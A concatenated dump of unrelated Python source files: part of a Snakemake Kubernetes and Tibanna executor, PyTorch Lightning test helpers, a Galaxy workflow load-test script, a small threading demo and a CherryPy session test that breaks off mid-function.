raise WorkflowError("ConfigMap too large")
self.kubeapi.create_namespaced_secret(self.namespace, secret)
def unregister_secret(self):
import kubernetes.client
safe_delete_secret = lambda: self.kubeapi.delete_namespaced_secret(
self.run_namespace, self.namespace, body=kubernetes.client.V1DeleteOptions()
)
self._kubernetes_retry(safe_delete_secret)
# In rare cases, deleting a pod may rais 404 NotFound error.
def safe_delete_pod(self, jobid, ignore_not_found=True):
import kubernetes.client
body = kubernetes.client.V1DeleteOptions()
try:
self.kubeapi.delete_namespaced_pod(jobid, self.namespace, body=body)
except kubernetes.client.rest.ApiException as e:
if e.status == 404 and ignore_not_found:
# Can't find the pod. Maybe it's already been
# destroyed. Proceed with a warning message.
logger.warning(
"[WARNING] 404 not found when trying to delete the pod: {jobid}\n"
"[WARNING] Ignore this error\n".format(jobid=jobid)
)
else:
raise e
def shutdown(self):
self.unregister_secret()
super().shutdown()
def cancel(self):
import kubernetes.client
body = kubernetes.client.V1DeleteOptions()
with self.lock:
for j in self.active_jobs:
func = lambda: self.safe_delete_pod(j.jobid, ignore_not_found=True)
self._kubernetes_retry(func)
self.shutdown()
def run(self, job, callback=None, submit_callback=None, error_callback=None):
import kubernetes.client
super()._run(job)
exec_job = self.format_job(
self.exec_job,
job,
_quote_all=True,
use_threads="--force-use-threads" if not job.is_group() else "",
)
# Kubernetes silently does not submit a job if the name is too long
# therefore, we ensure that it is not longer than snakejob+uuid.
jobid = "snakejob-{}".format(
get_uuid("{}-{}-{}".format(self.run_namespace, job.jobid, job.attempt))
)
body = kubernetes.client.V1Pod()
body.metadata = kubernetes.client.V1ObjectMeta(labels={"app": "snakemake"})
body.metadata.name = jobid
# container
container = kubernetes.client.V1Container(name=jobid)
container.image = self.container_image
container.command = shlex.split("/bin/sh")
container.args = ["-c", exec_job]
container.working_dir = "/workdir"
container.volume_mounts = [
kubernetes.client.V1VolumeMount(name="workdir", mount_path="/workdir")
]
container.volume_mounts = [
kubernetes.client.V1VolumeMount(name="source", mount_path="/source")
]
body.spec = kubernetes.client.V1PodSpec(containers=[container])
# fail on first error
body.spec.restart_policy = "Never"
# source files as a secret volume
# we copy these files to the workdir before executing Snakemake
too_large = [
path
for path in self.secret_files.values()
if os.path.getsize(path) > 1000000
]
if too_large:
raise WorkflowError(
"The following source files exceed the maximum "
"file size (1MB) that can be passed from host to "
"kubernetes. These are likely not source code "
"files. Consider adding them to your "
"remote storage instead or (if software) use "
"Conda packages or container images:\n{}".format("\n".join(too_large))
)
secret_volume = kubernetes.client.V1Volume(name="source")
secret_volume.secret = kubernetes.client.V1SecretVolumeSource()
secret_volume.secret.secret_name = self.run_namespace
secret_volume.secret.items = [
kubernetes.client.V1KeyToPath(key=key, path=path)
for key, path in self.secret_files.items()
]
# workdir as an emptyDir volume of undefined size
workdir_volume = kubernetes.client.V1Volume(name="workdir")
workdir_volume.empty_dir = kubernetes.client.V1EmptyDirVolumeSource()
body.spec.volumes = [secret_volume, workdir_volume]
# env vars
container.env = []
for key, e in self.secret_envvars.items():
envvar = kubernetes.client.V1EnvVar(name=e)
envvar.value_from = kubernetes.client.V1EnvVarSource()
envvar.value_from.secret_key_ref = kubernetes.client.V1SecretKeySelector(
key=key, name=self.run_namespace
)
container.env.append(envvar)
# request resources
container.resources = kubernetes.client.V1ResourceRequirements()
container.resources.requests = {}
container.resources.requests["cpu"] = job.resources["_cores"]
if "mem_mb" in job.resources.keys():
container.resources.requests["memory"] = "{}M".format(
job.resources["mem_mb"]
)
# capabilities
if job.needs_singularity and self.workflow.use_singularity:
# TODO this should work, but it doesn't currently because of
# missing loop devices
# singularity inside docker requires SYS_ADMIN capabilities
# see https://groups.google.com/a/lbl.gov/forum/#!topic/singularity/e9mlDuzKowc
# container.capabilities = kubernetes.client.V1Capabilities()
# container.capabilities.add = ["SYS_ADMIN",
# "DAC_OVERRIDE",
# "SETUID",
# "SETGID",
# "SYS_CHROOT"]
# Running in priviledged mode always works
container.security_context = kubernetes.client.V1SecurityContext(
privileged=True
)
pod = self._kubernetes_retry(
lambda: self.kubeapi.create_namespaced_pod(self.namespace, body)
)
logger.info(
"Get status with:\n"
"kubectl describe pod {jobid}\n"
"kubectl logs {jobid}".format(jobid=jobid)
)
self.active_jobs.append(
KubernetesJob(job, jobid, callback, error_callback, pod, None)
)
# Sometimes, certain k8s requests throw kubernetes.client.rest.ApiException
# Solving this issue requires reauthentication, as _kubernetes_retry shows
# However, reauthentication itself, under rare conditions, may also throw
# errors such as:
# kubernetes.client.exceptions.ApiException: (409), Reason: Conflict
#
# This error doesn't mean anything wrong with the k8s cluster, and users can safely
# ignore it.
def _reauthenticate_and_retry(self, func=None):
import kubernetes
# Unauthorized.
# Reload config in order to ensure token is
# refreshed. Then try again.
logger.info("Trying to reauthenticate")
kubernetes.config.load_kube_config()
subprocess.run(["kubectl", "get", "nodes"])
self.kubeapi = kubernetes.client.CoreV1Api()
self.batchapi = kubernetes.client.BatchV1Api()
try:
self.register_secret()
except kubernetes.client.rest.ApiException as e:
if e.status == 409 and e.reason == "Conflict":
logger.warning("409 conflict ApiException when registering secrets")
logger.warning(e)
else:
raise WorkflowError(
e,
"This is likely a bug in "
"https://github.com/kubernetes-client/python.",
)
if func:
return func()
def _kubernetes_retry(self, func):
import kubernetes
import urllib3
with self.lock:
try:
return func()
except kubernetes.client.rest.ApiException as e:
if e.status == 401:
# Unauthorized.
# Reload config in order to ensure token is
# refreshed. Then try again.
return self._reauthenticate_and_retry(func)
# Handling timeout that may occur in case of GKE master upgrade
except urllib3.exceptions.MaxRetryError as e:
logger.info(
"Request time out! "
"check your connection to Kubernetes master"
"Workflow will pause for 5 minutes to allow any update operations to complete"
)
time.sleep(300)
try:
return func()
except:
# Still can't reach the server after 5 minutes
raise WorkflowError(
e,
"Error 111 connection timeout, please check"
" that the k8 cluster master is reachable!",
)
def _wait_for_jobs(self):
import kubernetes
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for j in active_jobs:
with self.status_rate_limiter:
logger.debug("Checking status for pod {}".format(j.jobid))
job_not_found = False
try:
res = self._kubernetes_retry(
lambda: self.kubeapi.read_namespaced_pod_status(
j.jobid, self.namespace
)
)
except kubernetes.client.rest.ApiException as e:
if e.status == 404:
# Jobid not found
# The job is likely already done and was deleted on
# the server.
j.callback(j.job)
continue
except WorkflowError as e:
print_exception(e, self.workflow.linemaps)
j.error_callback(j.job)
continue
if res is None:
msg = (
"Unknown pod {jobid}. "
"Has the pod been deleted "
"manually?"
).format(jobid=j.jobid)
self.print_job_error(j.job, msg=msg, jobid=j.jobid)
j.error_callback(j.job)
elif res.status.phase == "Failed":
msg = (
"For details, please issue:\n"
"kubectl describe pod {jobid}\n"
"kubectl logs {jobid}"
).format(jobid=j.jobid)
# failed
self.print_job_error(j.job, msg=msg, jobid=j.jobid)
j.error_callback(j.job)
elif res.status.phase == "Succeeded":
# finished
j.callback(j.job)
func = lambda: self.safe_delete_pod(
j.jobid, ignore_not_found=True
)
self._kubernetes_retry(func)
else:
# still active
still_running.append(j)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
TibannaJob = namedtuple(
"TibannaJob", "job jobname jobid exec_arn callback error_callback"
)
class TibannaExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
cores,
tibanna_sfn,
precommand="",
tibanna_config=False,
container_image=None,
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
local_input=None,
restart_times=None,
max_status_checks_per_second=1,
keepincomplete=False,
keepmetadata=True,
):
self.workflow = workflow
self.workflow_sources = []
for wfs in workflow.get_sources():
if os.path.isdir(wfs):
for (dirpath, dirnames, filenames) in os.walk(wfs):
self.workflow_sources.extend(
[os.path.join(dirpath, f) for f in filenames]
)
else:
self.workflow_sources.append(os.path.abspath(wfs))
log = "sources="
for f in self.workflow_sources:
log += f
logger.debug(log)
self.snakefile = workflow.main_snakefile
self.envvars = {e: os.environ[e] for e in workflow.envvars}
if self.envvars:
logger.debug("envvars = %s" % str(self.envvars))
self.tibanna_sfn = tibanna_sfn
if precommand:
self.precommand = precommand
else:
self.precommand = ""
self.s3_bucket = workflow.default_remote_prefix.split("/")[0]
self.s3_subdir = re.sub(
"^{}/".format(self.s3_bucket), "", workflow.default_remote_prefix
)
logger.debug("precommand= " + self.precommand)
logger.debug("bucket=" + self.s3_bucket)
logger.debug("subdir=" + self.s3_subdir)
self.quiet = quiet
exec_job = (
"snakemake {target} --snakefile {snakefile} "
"--force --cores {cores} --keep-target-files --keep-remote "
"--latency-wait 0 --scheduler {workflow.scheduler_type} "
"--attempt 1 {use_threads} --max-inventory-time 0 "
"{overwrite_config} {rules} --nocolor "
"--notemp --no-hooks --nolock "
)
super().__init__(
workflow,
dag,
cores,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
local_input=local_input,
restart_times=restart_times,
exec_job=exec_job,
assume_shared_fs=False,
max_status_checks_per_second=max_status_checks_per_second,
disable_default_remote_provider_args=True,
disable_get_default_resources_args=True,
)
self.container_image = container_image or get_container_image()
self.tibanna_config = tibanna_config
def shutdown(self):
# perform additional steps on shutdown if necessary
logger.debug("shutting down Tibanna executor")
super().shutdown()
def cancel(self):
from tibanna.core import API
for j in self.active_jobs:
logger.info("killing job {}".format(j.jobname))
while True:
try:
res = API().kill(j.exec_arn)
if not self.quiet:
print(res)
break
except KeyboardInterrupt:
pass
self.shutdown()
def split_filename(self, filename, checkdir=None):
f = os.path.abspath(filename)
if checkdir:
checkdir = checkdir.rstrip("/")
if f.startswith(checkdir):
fname = re.sub("^{}/".format(checkdir), "", f)
fdir = checkdir
else:
direrrmsg = (
"All source files including Snakefile, "
+ "conda env files, and rule script files "
+ "must be in the same working directory: {} vs {}"
)
raise WorkflowError(direrrmsg.format(checkdir, f))
else:
fdir, fname = os.path.split(f)
return fname, fdir
def remove_prefix(self, s):
return re.sub("^{}/{}/".format(self.s3_bucket, self.s3_subdir), "", s)
def handle_remote(self, target):
if isinstance(target, _IOFile) and target.remote_object.provider.is_default:
return self.remove_prefix(target)
else:
return target
def add_command(self, job, tibanna_args, tibanna_config):
# snakefile, with file name remapped
snakefile_fname = tibanna_args.snakemake_main_filename
# targets, with file name remapped
targets = job.get_targets()
if not isinstance(targets, list):
targets = [targets]
targets_default = " ".join([self.handle_remote(t) for t in targets])
# use_threads
use_threads = "--force-use-threads" if not job.is_group() else ""
# format command
command = self.format_job_pattern(
self.exec_job,
job,
target=targets_default,
snakefile=snakefile_fname,
use_threads=use_threads,
cores=tibanna_config["cpu"],
)
if self.precommand:
command = self.precommand + "; " + command
logger.debug("command = " + str(command))
tibanna_args.command = command
def add_workflow_files(self, job, tibanna_args):
snakefile_fname, snakemake_dir = self.split_filename(self.snakefile)
snakemake_child_fnames = []
for src in self.workflow_sources:
src_fname, _ = self.split_filename(src, snakemake_dir)
if src_fname != snakefile_fname: # redundant
snakemake_child_fnames.append(src_fname)
# change path for config files
self.workflow.overwrite_configfiles = [
self.split_filename(cf, snakemake_dir)[0]
for cf in self.workflow.overwrite_configfiles
]
tibanna_args.snakemake_directory_local = snakemake_dir
tibanna_args.snakemake_main_filename = snakefile_fname
tibanna_args.snakemake_child_filenames = list(set(snakemake_child_fnames))
def adjust_filepath(self, f):
if not hasattr(f, "remote_object"):
rel = self.remove_prefix(f) # log/benchmark
elif (
hasattr(f.remote_object, "provider") and f.remote_object.provider.is_default
):
rel = self.remove_prefix(f)
else:
rel = f
return rel
def make_tibanna_input(self, job):
from tibanna import ec2_utils, core as tibanna_core
# input & output
# Local snakemake command here must be run with --default-remote-prefix
# and --default-remote-provider (forced) but on VM these options will be removed.
# The snakemake on the VM will consider these input and output as not remote.
# They files are transferred to the container by Tibanna before running snakemake.
# In short, the paths on VM must be consistent with what's in Snakefile.
# but the actual location of the files is on the S3 bucket/prefix.
# This mapping info must be passed to Tibanna.
for i in job.input:
logger.debug("job input " + str(i))
logger.debug("job input is remote= " + ("true" if i.is_remote else "false"))
if hasattr(i.remote_object, "provider"):
logger.debug(
" is remote default= "
+ ("true" if i.remote_object.provider.is_default else "false")
)
for o in job.expanded_output:
logger.debug("job output " + str(o))
logger.debug(
"job output is remote= " + ("true" if o.is_remote else "false")
)
if hasattr(o.remote_object, "provider"):
logger.debug(
" is remote default= "
+ ("true" if o.remote_object.provider.is_default else "false")
)
file_prefix = (
"file:///data1/snakemake" # working dir inside snakemake container on VM
)
input_source = dict()
for ip in job.input:
ip_rel = self.adjust_filepath(ip)
input_source[os.path.join(file_prefix, ip_rel)] = "s3://" + ip
output_target = dict()
output_all = [eo for eo in job.expanded_output]
if job.log:
if isinstance(job.log, list):
output_all.extend([str(_) for _ in job.log])
else:
output_all.append(str(job.log))
if hasattr(job, "benchmark") and job.benchmark:
if isinstance(job.benchmark, list):
output_all.extend([str(_) for _ in job.benchmark])
else:
output_all.append(str(job.benchmark))
for op in output_all:
op_rel = self.adjust_filepath(op)
output_target[os.path.join(file_prefix, op_rel)] = "s3://" + op
# mem & cpu
mem = job.resources["mem_mb"] / 1024 if "mem_mb" in job.resources.keys() else 1
cpu = job.threads
# jobid, grouping, run_name
jobid = tibanna_core.create_jobid()
if job.is_group():
run_name = "snakemake-job-%s-group-%s" % (str(jobid), str(job.groupid))
else:
run_name = "snakemake-job-%s-rule-%s" % (str(jobid), str(job.rule))
# tibanna input
tibanna_config = {
"run_name": run_name,
"mem": mem,
"cpu": cpu,
"ebs_size": math.ceil(job.resources["disk_mb"] / 1024),
"log_bucket": self.s3_bucket,
}
logger.debug("additional tibanna config: " + str(self.tibanna_config))
if self.tibanna_config:
tibanna_config.update(self.tibanna_config)
tibanna_args = ec2_utils.Args(
output_S3_bucket=self.s3_bucket,
language="snakemake",
container_image=self.container_image,
input_files=input_source,
output_target=output_target,
input_env=self.envvars,
)
self.add_workflow_files(job, tibanna_args)
self.add_command(job, tibanna_args, tibanna_config)
tibanna_input = {
"jobid": jobid,
"config": tibanna_config,
"args": tibanna_args.as_dict(),
}
logger.debug(json.dumps(tibanna_input, indent=4))
return tibanna_input
def run(self, job, callback=None, submit_callback=None, error_callback=None):
logger.info("running job using Tibanna...")
from tibanna.core import API
super()._run(job)
# submit job here, and obtain job ids from the backend
tibanna_input = self.make_tibanna_input(job)
jobid = tibanna_input["jobid"]
exec_info = API().run_workflow(
tibanna_input,
sfn=self.tibanna_sfn,
verbose=not self.quiet,
jobid=jobid,
open_browser=False,
sleep=0,
)
exec_arn = exec_info.get("_tibanna", {}).get("exec_arn", "")
jobname = tibanna_input["config"]["run_name"]
jobid = tibanna_input["jobid"]
# register job as active, using your own namedtuple.
# The namedtuple must at least contain the attributes
# job, jobid, callback, error_callback.
self.active_jobs.append(
TibannaJob(job, jobname, jobid, exec_arn, callback, error_callback)
)
def _wait_for_jobs(self):
# busy wait on job completion
# This is only needed if your backend does not allow to use callbacks
# for obtaining job status.
from tibanna.core import API
while True:
# always use self.lock to avoid race conditions
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for j in active_jobs:
# use self.status_rate_limiter to avoid too many API calls.
with self.status_rate_limiter:
if j.exec_arn:
status = API().check_status(j.exec_arn)
else:
status = "FAILED_AT_SUBMISSION"
if not self.quiet or status != "RUNNING":
logger.debug("job %s: %s" % (j.jobname, status))
if status == "RUNNING":
still_running.append(j)
elif status == "SUCCEEDED":
j.callback(j.job)
else:
j.error_callback(j.job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
def run_wrapper(
job_rule,
input,
output,
params,
wildcards,
threads,
resources,
log,
benchmark,
benchmark_repeats,
conda_env,
container_img,
singularity_args,
env_modules,
use_singularity,
linemaps,
debug,
cleanup_scripts,
shadow_dir,
jobid,
edit_notebook,
conda_base_path,
basedir,
):
"""
Wrapper around the run method that handles exceptions and benchmarking.
Arguments
job_rule -- the ``job.rule`` member
input -- list of input files
output -- list of output files
wildcards -- so far processed wildcards
threads -- usable threads
log -- list of log files
shadow_dir -- optional shadow directory root
"""
# get shortcuts to job_rule members
run = job_rule.run_func
version = job_rule.version
rule = job_rule.name
is_shell = job_rule.shellcmd is not None
if os.name == "posix" and debug:
sys.stdin = open("/dev/stdin")
if benchmark is not None:
from snakemake.benchmark import (
BenchmarkRecord,
benchmarked,
write_benchmark_records,
)
# Change workdir if shadow defined and not using singularity.
# Otherwise, we do the change from inside the container.
passed_shadow_dir = None
if use_singularity and container_img:
passed_shadow_dir = shadow_dir
shadow_dir = None
try:
with change_working_directory(shadow_dir):
if benchmark:
bench_records = []
for bench_iteration in range(benchmark_repeats):
# Determine whether to benchmark this process or do not
# benchmarking at all. We benchmark this process unless the
# execution is done through the ``shell:``, ``script:``, or
# ``wrapper:`` stanza.
is_sub = (
job_rule.shellcmd
or job_rule.script
or job_rule.wrapper
or job_rule.cwl
)
if is_sub:
# The benchmarking through ``benchmarked()`` is started
# in the execution of the shell fragment, script, wrapper
# etc, as the child PID is available there.
bench_record = BenchmarkRecord()
run(
input,
output,
params,
wildcards,
threads,
resources,
log,
version,
rule,
conda_env,
container_img,
singularity_args,
use_singularity,
env_modules,
bench_record,
jobid,
is_shell,
bench_iteration,
cleanup_scripts,
passed_shadow_dir,
edit_notebook,
conda_base_path,
basedir,
)
else:
# The benchmarking is started here as we have a run section
# and the generated Python function is executed in this
# process' thread.
with benchmarked() as bench_record:
run(
input,
output,
params,
wildcards,
threads,
resources,
log,
version,
rule,
conda_env,
container_img,
singularity_args,
use_singularity,
env_modules,
bench_record,
jobid,
is_shell,
bench_iteration,
cleanup_scripts,
passed_shadow_dir,
edit_notebook,
conda_base_path,
basedir,
)
# Store benchmark record for this iteration
bench_records.append(bench_record)
else:
run(
input,
output,
params,
wildcards,
threads,
resources,
log,
version,
rule,
conda_env,
container_img,
singularity_args,
use_singularity,
env_modules,
None,
jobid,
is_shell,
None,
cleanup_scripts,
passed_shadow_dir,
edit_notebook,
conda_base_path,
basedir,
)
except (KeyboardInterrupt, SystemExit) as e:
# Re-raise the keyboard interrupt in order to record an error in the
# scheduler but ignore it
raise e
except (Exception, BaseException) as ex:
log_verbose_traceback(ex)
# this ensures that exception can be re-raised in the parent thread
lineno, file = get_exception_origin(ex, linemaps)
raise RuleException(
format_error(
ex, lineno, linemaps=linemaps, snakefile=file, show_traceback=True
)
)
if benchmark is not None:
try:
write_benchmark_records(bench_records, benchmark)
except (Exception, BaseException) as ex:
raise WorkflowError(ex)
|
utils.py
|
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import os
import traceback
from contextlib import contextmanager
from typing import Optional
import pytest
from pytorch_lightning import seed_everything
from pytorch_lightning.callbacks import ModelCheckpoint
from pytorch_lightning.loggers import TensorBoardLogger
from tests import _TEMP_PATH, RANDOM_PORTS
from tests.helpers.boring_model import BoringModel
def get_default_logger(save_dir, version=None):
# set up logger object without actually saving logs
logger = TensorBoardLogger(save_dir, name="lightning_logs", version=version)
return logger
def get_data_path(expt_logger, path_dir=None):
# some calls contain only experiment not complete logger
# each logger has to have these attributes
name, version = expt_logger.name, expt_logger.version
# the other experiments...
if not path_dir:
if hasattr(expt_logger, "save_dir") and expt_logger.save_dir:
path_dir = expt_logger.save_dir
else:
path_dir = _TEMP_PATH
path_expt = os.path.join(path_dir, name, "version_%s" % version)
# try if the new sub-folder exists, typical case for test-tube
if not os.path.isdir(path_expt):
path_expt = path_dir
return path_expt
def load_model_from_checkpoint(logger, root_weights_dir, module_class=BoringModel):
trained_model = module_class.load_from_checkpoint(root_weights_dir)
assert trained_model is not None, "loading model failed"
return trained_model
def assert_ok_model_acc(trainer, key="test_acc", thr=0.5):
# this model should get 0.80+ acc
acc = trainer.callback_metrics[key]
assert acc > thr, f"Model failed to get expected {thr} accuracy. {key} = {acc}"
def reset_seed(seed=0):
seed_everything(seed)
def set_random_main_port():
reset_seed()
port = RANDOM_PORTS.pop()
os.environ["MASTER_PORT"] = str(port)
def init_checkpoint_callback(logger):
checkpoint = ModelCheckpoint(dirpath=logger.save_dir)
return checkpoint
def pl_multi_process_test(func):
"""Wrapper for running multi-processing tests."""
@functools.wraps(func)
def wrapper(*args, **kwargs):
from multiprocessing import Process, Queue
queue = Queue()
def inner_f(queue, **kwargs):
try:
func(**kwargs)
queue.put(1)
except Exception:
_trace = traceback.format_exc()
print(_trace)
# code 17 means RuntimeError: tensorflow/compiler/xla/xla_client/mesh_service.cc:364 :
# Failed to meet rendezvous 'torch_xla.core.xla_model.save': Socket closed (14)
if "terminated with exit code 17" in _trace:
queue.put(1)
else:
queue.put(-1)
proc = Process(target=inner_f, args=(queue,), kwargs=kwargs)
proc.start()
proc.join()
result = queue.get()
assert result == 1, "expected 1, but returned %s" % result
return wrapper
@contextmanager
def no_warning_call(warning_type, match: Optional[str] = None):
with pytest.warns(None) as record:
yield
try:
w = record.pop(warning_type)
if not (match and match in str(w.message)):
return
except AssertionError:
# no warning raised
return
raise AssertionError(f"`{warning_type}` was raised: {w}")
|
workflows_scaling.py
|
import functools
import json
import os
import random
import sys
from threading import Thread
from uuid import uuid4
galaxy_root = os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir, os.path.pardir))
sys.path[1:1] = [ os.path.join( galaxy_root, "lib" ), os.path.join( galaxy_root, "test" ) ]
try:
from argparse import ArgumentParser
except ImportError:
ArgumentParser = None
try:
from galaxy import eggs
eggs.require("requests")
eggs.require("bioblend")
except ImportError:
pass
import requests
from bioblend import galaxy
from api import helpers, yaml_to_workflow
LONG_TIMEOUT = 1000000000
DESCRIPTION = "Script to exercise the workflow engine."
def main(argv=None):
if ArgumentParser is None:
raise Exception("Test requires Python 2.7")
arg_parser = ArgumentParser(description=DESCRIPTION)
arg_parser.add_argument("--api_key", default="testmasterapikey")
arg_parser.add_argument("--host", default="http://localhost:8080/")
arg_parser.add_argument("--collection_size", type=int, default=20)
arg_parser.add_argument("--workflow_depth", type=int, default=10)
arg_parser.add_argument("--two_outputs", default=False, action="store_true")
arg_parser.add_argument("--workflow_count", type=int, default=1)
args = arg_parser.parse_args(argv)
uuid = str(uuid4())
workflow_struct = _workflow_struct(args, uuid)
gi = _gi(args)
workflow = yaml_to_workflow.python_to_workflow(workflow_struct)
workflow_info = gi.workflows.import_workflow_json(workflow)
workflow_id = workflow_info["id"]
target = functools.partial(_run, args, gi, workflow_id, uuid)
threads = []
for i in range(args.workflow_count):
t = Thread(target=target)
t.daemon = True
t.start()
threads.append(t)
for t in threads:
t.join()
def _run(args, gi, workflow_id, uuid):
dataset_populator = GiDatasetPopulator(gi)
dataset_collection_populator = GiDatasetCollectionPopulator(gi)
history_id = dataset_populator.new_history()
contents = []
for i in range(args.collection_size):
contents.append("random dataset number #%d" % i)
hdca = dataset_collection_populator.create_list_in_history( history_id, contents=contents ).json()
label_map = {
uuid: {"src": "hdca", "id": hdca["id"]},
}
workflow_request = dict(
history="hist_id=%s" % history_id,
)
workflow_request[ "inputs" ] = json.dumps( label_map )
url = "workflows/%s/usage" % ( workflow_id )
invoke_response = dataset_populator._post( url, data=workflow_request ).json()
invocation_id = invoke_response["id"]
workflow_populator = GiWorkflowPopulator(gi)
workflow_populator.wait_for_workflow( workflow_id, invocation_id, history_id, timeout=LONG_TIMEOUT )
class GiPostGetMixin:
def _get(self, route):
return self._gi.make_get_request(self.__url(route))
def _post(self, route, data={}):
data = data.copy()
data['key'] = self._gi.key
return requests.post(self.__url(route), data=data)
def __url(self, route):
return self._gi.url + "/" + route
class GiDatasetPopulator(helpers.BaseDatasetPopulator, GiPostGetMixin):
def __init__(self, gi):
self._gi = gi
class GiDatasetCollectionPopulator(helpers.BaseDatasetCollectionPopulator, GiPostGetMixin):
def __init__(self, gi):
self._gi = gi
self.dataset_populator = GiDatasetPopulator(gi)
def _create_collection(self, payload):
create_response = self._post( "dataset_collections", data=payload )
return create_response
class GiWorkflowPopulator(helpers.BaseWorkflowPopulator, GiPostGetMixin):
def __init__(self, gi):
self._gi = gi
self.dataset_populator = GiDatasetPopulator(gi)
def _workflow_struct(args, input_uuid):
if args.two_outputs:
return _workflow_struct_two_outputs(args, input_uuid)
else:
return _workflow_struct_simple(args, input_uuid)
def _workflow_struct_simple(args, input_uuid):
workflow_struct = [
{"type": "input_collection", "uuid": input_uuid},
{"tool_id": "cat1", "state": {"input1": _link(0)}}
]
workflow_depth = args.workflow_depth
for i in range(workflow_depth):
link = str(i + 1) + "#out_file1"
workflow_struct.append(
{"tool_id": "cat1", "state": {"input1": _link(link)}}
)
return workflow_struct
def _workflow_struct_two_outputs(args, input_uuid):
workflow_struct = [
{"type": "input_collection", "uuid": input_uuid},
{"tool_id": "cat1", "state": {"input1": _link(0), "input2": _link(0)}}
]
workflow_depth = args.workflow_depth
for i in range(workflow_depth):
link1 = str(i + 1) + "#out_file1"
link2 = str(i + 1) + "#out_file2"
workflow_struct.append(
{"tool_id": "cat1", "state": {"input1": _link(link1), "input2": _link(link2)}}
)
return workflow_struct
def _link(link):
return {"$link": link}
def _gi(args):
gi = galaxy.GalaxyInstance(args.host, key=args.api_key)
name = "wftest-user-%d" % random.randint(0, 1000000)
user = gi.users.create_local_user(name, "%s@galaxytesting.dev" % name, "pass123")
user_id = user["id"]
api_key = gi.users.create_user_apikey(user_id)
user_gi = galaxy.GalaxyInstance(args.host, api_key)
return user_gi
if __name__ == "__main__":
main()
|
thread_test1.py
|
import threading
import time
# https://www.maxlist.xyz/2020/03/15/python-threading/
def main(url, num):
print('開始執行', url)
time.sleep(2)
print('結束', num)
url_list1 = ['11111, 1-1-1-1-1']
url_list2 = ['22222, 2-2-2-2-2']
url_list3 = ['33333, 3-3-3-3-3']
# 定義線程
t_list = []
t1 = threading.Thread(target=main, args=(url_list1, 1))
t_list.append(t1)
t2 = threading.Thread(target=main, args=(url_list2, 2))
t_list.append(t2)
t3 = threading.Thread(target=main, args=(url_list3, 3))
t_list.append(t3)
# 開始工作
for t in t_list:
t.start()
# 調整多程順序
for t in t_list:
t.join()
|
test_session.py
|
import os
localDir = os.path.dirname(__file__)
import threading
import time
import cherrypy
from cherrypy._cpcompat import copykeys, HTTPConnection, HTTPSConnection
from cherrypy.lib import sessions
from cherrypy.lib import reprconf
from cherrypy.lib.httputil import response_codes
def http_methods_allowed(methods=['GET', 'HEAD']):
method = cherrypy.request.method.upper()
if method not in methods:
cherrypy.response.headers['Allow'] = ", ".join(methods)
raise cherrypy.HTTPError(405)
cherrypy.tools.allow = cherrypy.Tool('on_start_resource', http_methods_allowed)
def setup_server():
@cherrypy.config(**{
'tools.sessions.on': True,
'tools.sessions.storage_class': sessions.RamSession,
'tools.sessions.storage_path': localDir,
'tools.sessions.timeout': (1.0 / 60),
'tools.sessions.clean_freq': (1.0 / 60),
})
class Root:
@cherrypy.expose
def clear(self):
cherrypy.session.cache.clear()
@cherrypy.expose
def data(self):
cherrypy.session['aha'] = 'foo'
return repr(cherrypy.session._data)
@cherrypy.expose
def testGen(self):
counter = cherrypy.session.get('counter', 0) + 1
cherrypy.session['counter'] = counter
yield str(counter)
@cherrypy.expose
def testStr(self):
counter = cherrypy.session.get('counter', 0) + 1
cherrypy.session['counter'] = counter
return str(counter)
@cherrypy.expose
@cherrypy.config(**{'tools.sessions.on': False})
def set_session_cls(self, new_cls_name):
new_cls = reprconf.attributes(new_cls_name)
cfg = {'tools.sessions.storage_class': new_cls}
self.__class__._cp_config.update(cfg)
if hasattr(cherrypy, "session"):
del cherrypy.session
if new_cls.clean_thread:
new_cls.clean_thread.stop()
new_cls.clean_thread.unsubscribe()
del new_cls.clean_thread
@cherrypy.expose
def index(self):
sess = cherrypy.session
c = sess.get('counter', 0) + 1
time.sleep(0.01)
sess['counter'] = c
return str(c)
@cherrypy.expose
def keyin(self, key):
return str(key in cherrypy.session)
@cherrypy.expose
def delete(self):
cherrypy.session.delete()
sessions.expire()
return "done"
@cherrypy.expose
def delkey(self, key):
del cherrypy.session[key]
return "OK"
@cherrypy.expose
def redir_target(self):
return self._cp_config['tools.sessions.storage_class'].__name__
@cherrypy.expose
def iredir(self):
raise cherrypy.InternalRedirect('/redir_target')
@cherrypy.expose
@cherrypy.config(**{
'tools.allow.on': True,
'tools.allow.methods': ['GET'],
})
def restricted(self):
return cherrypy.request.method
@cherrypy.expose
def regen(self):
cherrypy.tools.sessions.regenerate()
return "logged in"
@cherrypy.expose
def length(self):
return str(len(cherrypy.session))
@cherrypy.expose
@cherrypy.config(**{
'tools.sessions.path': '/session_cookie',
'tools.sessions.name': 'temp',
'tools.sessions.persistent': False,
})
def session_cookie(self):
# Must load() to start the clean thread.
cherrypy.session.load()
return cherrypy.session.id
cherrypy.tree.mount(Root())
from cherrypy.test import helper
class SessionTest(helper.CPWebCase):
setup_server = staticmethod(setup_server)
def tearDown(self):
# Clean up sessions.
for fname in os.listdir(localDir):
if fname.startswith(sessions.FileSession.SESSION_PREFIX):
os.unlink(os.path.join(localDir, fname))
def test_0_Session(self):
self.getPage('/set_session_cls/cherrypy.lib.sessions.RamSession')
self.getPage('/clear')
# Test that a normal request gets the same id in the cookies.
# Note: this wouldn't work if /data didn't load the session.
self.getPage('/data')
self.assertBody("{'aha': 'foo'}")
c = self.cookies[0]
self.getPage('/data', self.cookies)
self.assertEqual(self.cookies[0], c)
self.getPage('/testStr')
self.assertBody('1')
cookie_parts = dict([p.strip().split('=')
for p in self.cookies[0][1].split(";")])
